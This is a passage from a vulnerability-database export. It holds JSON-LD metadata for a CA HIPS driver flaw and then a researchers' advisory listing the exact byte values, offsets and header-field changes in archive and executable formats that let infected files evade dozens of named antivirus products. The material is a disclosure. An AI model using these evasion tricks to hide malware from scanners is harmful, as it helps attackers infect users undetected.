},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-33051",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-2926",
"trust": 3.0
},
{
"db": "BID",
"id": "30651",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "31434",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1020659",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1020658",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1020660",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2008-2339",
"trust": 2.5
},
{
"db": "XF",
"id": "44392",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "69034",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "69035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-33051",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68975",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"id": "VAR-200808-0147",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:12:04.054000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "36559",
"trust": 0.8,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"title": "36559",
"trust": 0.8,
"url": "http://www.ca.com/jp/securityadvisor/vulninfo/vuln.aspx?id=36559"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/30651"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020658"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020659"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020660"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/31434"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2008/2339"
},
{
"trust": 2.2,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/495397/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44392"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2926"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/44392"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-2926"
},
{
"trust": 0.4,
"url": "http://www.trapkit.de/advisories/tkadv2008-006.txt"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.4,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560"
},
{
"trust": 0.3,
"url": "/archive/1/495427"
},
{
"trust": 0.3,
"url": "/archive/1/495397"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2926"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/advisories/tk-advisories-signature-key.asc"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/18834/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19549/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solutionresults?aparno=ro00535\u0026actionid=4"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://shop.ca.com/support."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/redirarticles?reqpage=search\u0026se"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=182496"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-33051"
},
{
"date": "2008-08-11T00:00:00",
"db": "BID",
"id": "30651"
},
{
"date": "2010-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"date": "2008-08-13T05:43:58",
"db": "PACKETSTORM",
"id": "69035"
},
{
"date": "2008-08-13T01:46:19",
"db": "PACKETSTORM",
"id": "68975"
},
{
"date": "2008-08-13T05:41:53",
"db": "PACKETSTORM",
"id": "69034"
},
{
"date": "2008-08-12T23:41:00",
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"date": "2008-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-33051"
},
{
"date": "2008-08-25T22:25:00",
"db": "BID",
"id": "30651"
},
{
"date": "2010-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"date": "2021-04-09T17:08:01.597000",
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"date": "2021-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Host-Based Intrusion Prevention System of kmxfw.sys Driver vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.6
}
}
VAR-201203-0400
Vulnerability from variot - Updated: 2023-12-18 12:10The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA eTrust Vet Antivirus 36.1.8511, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified identsize field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. CVE May be split intoChanged by a third party identsize Have fields ELF Via files, malware detection can be bypassed. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.
Vulnerability Descriptions
- Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.
Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00
CVE no - CVE-2012-1419
- Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103
CVE no - CVE-2012-1421
- Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1422
- Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.
Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0
CVE no - CVE-2012-1423
- Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0
CVE no - CVE-2012-1424
- Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1426
- Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1427
- Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1428
Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01
CVE no - CVE-2012-1429 12.
Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1430 13.
Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1431
- Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1432
- Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1433
- Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1434
- Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1435
- Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1436
- Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.
Affected products - Comodo 7425
CVE no - CVE-2012-1437
- Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.
Affected products - Comodo 7425, Sophos 4.61.0
CVE no - CVE-2012-1438
- 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1439
- 'identsize' field in ELF files is parsed incorrectly.
If an infected ELF file's identsize field is incremented by 1 it evades
detection. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.
Affected products - Prevx 3.0
'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',
'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and
'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1
it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0
CVE no - CVE-2012-1441
- 'class' field in ELF files is parsed incorrectly.
Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1442
- Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.
Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2
CVE no - CVE-2012-1443
- 'abiversion' field in ELF files is parsed incorrectly.
If an infected ELF file's abiversion field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1444
- 'abi' field in ELF files is parsed incorrectly.
If an infected ELF file's abi field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1445
- 'encoding' field in ELF files is parsed incorrectly.
If an infected ELF file's encoding field is incremented by 1 it evades detection. 'e_version' field in ELF files is parsed incorrectly.
If an infected ELF file's e_version field is incremented by 1 it evades detection.
Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7
CVE no - CVE-2012-1447
- 'cbCabinet' field in CAB files is parsed incorrectly.
If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1
CVE no - CVE-2012-1448
- 'vMajor' field in CAB files is parsed incorrectly.
If an infected CAB file's vMajor field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1449
- 'reserved3' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1450
- 'reserved2' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved2 field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1451
- 'reserved1' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00
CVE no - CVE-2012-1452
- 'coffFiles' field in CAB files is parsed incorrectly.
If an infected CAB file's coffFiles field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1453
- 'ei_version' field in ELF files is parsed incorrectly.
If an infected ELF file's version field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1454
- 'vMinor' field in CAB files is parsed incorrectly.
If an infected CAB file's version field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1455
- A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1457
- A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.
If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.
Affected products - ClamAV 0.96.4, Sophos 4.61.0
CVE no - CVE-2012-1458
- In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.
If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1459
- If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2
CVE no - CVE-2012-1460
- GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly
Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2
CVE no - CVE-2012-1461
- If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes
Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103
CVE no - CVE-2012-1462
- In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.
Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7
CVE no - CVE-2012-1463
Credits
Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.
References
"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0400",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "esafe",
"scope": "eq",
"trust": 1.8,
"vendor": "aladdin",
"version": "7.0.17.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "antivirus \\\u0026 antispyware",
"scope": "eq",
"trust": 1.0,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "norman",
"version": "6.6.12"
},
{
"model": "antivirus",
